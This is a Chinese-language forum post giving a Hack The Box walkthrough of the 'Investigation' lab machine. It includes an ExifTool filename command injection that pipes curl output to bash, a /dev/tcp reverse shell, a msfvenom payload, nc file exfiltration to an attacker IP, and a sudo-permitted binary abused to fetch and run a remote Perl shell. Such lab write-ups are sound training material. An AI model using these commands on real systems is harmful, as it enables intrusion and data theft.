-
-
[原创]HTB Investigation (MEDIUM)
-
发表于: 2023-1-29 17:34 609
-
上来还是先进行信息收集
还是只开了22和80
上传一个jpg文件来分析,存在文件上传
可以发现
ExifTool Version Number : 12.37
经过信息收集可以找到ExifTool相关漏洞
https://gist.github.com/ert-plus/1414276e4cb5d56dd431c2f0429e4429
ExifTool < 12.38 存在操作系统命令执行
确认漏洞存在
传个马上去
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.10 LPORT=9876 -f elf > r.elf
直接上传文件的方式失败
1 2 3 | echo "sh -i >& /dev/tcp/10.10.16.10/9876 0>&1" > index.html python3 - m http.server 80 filename = "curl 10.10.16.10 | bash |" |
获得www-data的shell
没有权限去拿flag
进行信息收集,有些配置文件可能会叫msg类似的名
1 2 | find / usr / local / - name '*msg*' / usr / local / investigation / Windows Event Logs for Analysis.msg |
1 2 | nc - w 3 10.10 . 16.10 6666 < 'Windows Event Logs for Analysis.msg' nc - lp 6666 > 'Windows Event Logs for Analysis.msg' |
https://www.encryptomatic.com/viewer/
在网站上查看msg文件
获得压缩包,解压后的文件win上可以直接打开查看,但是不好找到关键信息
有关evtx的信息
https://andreafortuna.org/2017/10/20/windows-event-logs-in-forensic-analysis/
在事件ID为4625 登录失败中找到了密码
Def@ultf0r3nz!csPa$$
登录成功
我们可以在这个目录下 /usr/bin/binary 不使用密码以root权限执行程序
本机创建root.pl写入shell
https://www.revshells.com/
一直执行不成功,后发现是/usr/bin/binary中有密码lDnxUysaQn
1 2 | nc - w 3 10.10 . 16.10 6666 < / usr / bin / binary nc - lp 6666 > '123' |
1 | sudo / usr / bin / binary http: / / 10.10 . 16.10 / shellxx.pl lDnxUysaQn |
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
赞赏
他的文章
看原图
赞赏
雪币:
留言: